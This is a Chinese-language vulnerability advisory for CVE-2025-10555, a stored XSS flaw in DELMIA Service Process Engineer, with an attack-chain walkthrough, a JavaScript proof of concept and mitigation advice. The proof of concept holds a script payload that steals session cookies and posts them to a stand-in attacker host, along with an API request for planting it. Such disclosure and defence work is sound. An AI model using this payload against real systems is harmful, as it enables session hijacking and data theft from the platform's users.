CVE-2025-10555: DELMIA Service Process Engineer存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-10555

漏洞类型

存储型跨站脚本攻击(Stored XSS)

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

DELMIA Service Process Engineer on Release 3DEXPERIENCE R2025x

漏洞概述

CVE-2025-10555是达索系统(Dassault Systèmes)旗下DELMIA Service Process Engineer产品中存在的一个高危安全漏洞。该漏洞为存储型跨站脚本攻击(Stored Cross-site Scripting)，主要影响3DEXPERIENCE平台R2025x版本中的Service Items Management（服务项管理）功能。由于该功能在处理用户输入时未进行充分的输入验证和输出编码，攻击者可以在服务项名称或相关字段中注入恶意JavaScript脚本代码。当其他用户访问或查看这些被污染的服务项时，恶意代码会在其浏览器会话中执行，从而窃取会话令牌、劫持用户账户、修改页面内容或进行其他恶意操作。存储型XSS的特点是攻击代码被永久存储在服务器端，所有访问受影响内容的用户都会受到攻击，这使得该漏洞具有广泛的危害性和传播性。CVSS评分8.7，属于高危级别，需要网络低权限用户进行交互才能利用，但对机密性和完整性造成严重影响。

技术细节

该存储型XSS漏洞源于DELMIA Service Process Engineer的Service Items Management模块对用户输入缺乏严格的输入验证和输出编码机制。攻击者以低权限用户身份登录3DEXPERIENCE平台后，可以在创建或编辑服务项的过程中，在名称、描述或其他可输入字段中插入恶意脚本代码。由于系统未对这些输入进行适当的清理和转义，攻击载荷会被直接存储到数据库中。当其他用户通过浏览器访问这些服务项时，服务器将未经处理的攻击代码随页面内容一起返回给客户端浏览器。浏览器将其解析为可执行脚本后，恶意代码便在受害者的浏览器上下文中执行，成功绕过同源策略(SOP)限制。攻击者可利用此漏洞执行任意JavaScript代码，包括窃取用户会话cookie、读取页面敏感信息、修改DOM内容或诱导用户执行其他操作。由于3DEXPERIENCE平台通常用于企业级协作环境，该漏洞可能被利用来横向移动或获取更高权限的访问。

攻击链分析

STEP 1

步骤1: 信息收集与初始访问

攻击者获取3DEXPERIENCE平台的低权限账户凭证，可以通过社会工程学、凭证填充或利用其他漏洞获得初始访问权限

STEP 2

步骤2: 定位目标功能

攻击者登录平台后导航至DELMIA模块下的Service Process Engineer，找到Service Items Management（服务项管理）功能

STEP 3

步骤3: 注入恶意代码

攻击者在创建或编辑服务项时，将包含恶意JavaScript代码的XSS payload注入到名称、描述或其他文本输入字段中，并保存提交

STEP 4

步骤4: 持久化存储

由于系统缺乏输入验证，恶意payload被未经处理直接存储到数据库中，实现持久化，攻击代码将在服务器端长期存在

STEP 5

步骤5: 等待受害者访问

攻击者等待其他用户（可能是高权限用户或管理员）访问或查看被污染的服务项内容，此时恶意脚本随页面内容一同加载

STEP 6

步骤6: 脚本执行与攻击成功

受害者浏览器将页面内容中的<script>标签解析执行，恶意JavaScript在受害者浏览器上下文中运行，可窃取会话令牌、敏感数据或执行进一步攻击

STEP 7

步骤7: 横向移动或数据窃取

攻击者利用窃取的凭证或会话信息尝试横向移动，获取更高权限访问，可能导致企业敏感数据泄露或系统完全沦陷

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-10555 PoC - Stored XSS in DELMIA Service Process Engineer
// Target: Service Items Management in 3DEXPERIENCE R2025x
// Note: This PoC is for educational and authorized testing purposes only

// Malicious payload to be injected into Service Item name/description field
const xssPayload = '<script>\n'
  + '  // Steal session cookies\n'
  + '  var cookies = document.cookie;\n'
  + '  var xhr = new XMLHttpRequest();\n'
  + '  xhr.open("POST", "https://attacker-c2-server.com/exfil", true);\n'
  + '  xhr.setRequestHeader("Content-Type", "application/json");\n'
  + '  xhr.send(JSON.stringify({\n'
  + '    "cve": "CVE-2025-10555",\n'
  + '    "cookies": cookies,\n'
  + '    "url": window.location.href,\n'
  + '    "userAgent": navigator.userAgent\n'
  + '  }));\n'
  + '</script>';

// Attack flow:
// 1. Attacker with low privilege access logs into 3DEXPERIENCE platform
// 2. Navigate to DELMIA > Service Process Engineer > Service Items Management
// 3. Create new or edit existing Service Item
// 4. Inject XSS payload into name/description field
// 5. Save the Service Item - payload is now stored persistently
// 6. When any user views the affected Service Item, payload executes

// Example API request structure (if API access available):
const exploitRequest = {
  method: 'POST',
  url: '/api/v1/service-items',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <attacker_token>'
  },
  body: {
    name: xssPayload,
    description: 'Malicious Service Item',
    category: 'Test'
  }
};

console.log('CVE-2025-10555 PoC Generated');
console.log('Payload length:', xssPayload.length, 'characters');

影响范围

DELMIA Service Process Engineer R2025x (所有版本)

3DEXPERIENCE R2025x (受影响版本)

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：限制Service Items Management功能的访问权限，仅授权必要用户访问；对所有服务项字段实施严格的输入过滤规则，过滤或转义HTML标签和JavaScript相关字符；启用WAF(Web应用防火墙)规则对XSS攻击进行检测和阻断；增强会话管理机制，定期刷新会话令牌；对相关功能操作进行全面审计日志记录，便于异常行为检测；加强对高权限用户的安全意识培训，警惕可疑内容。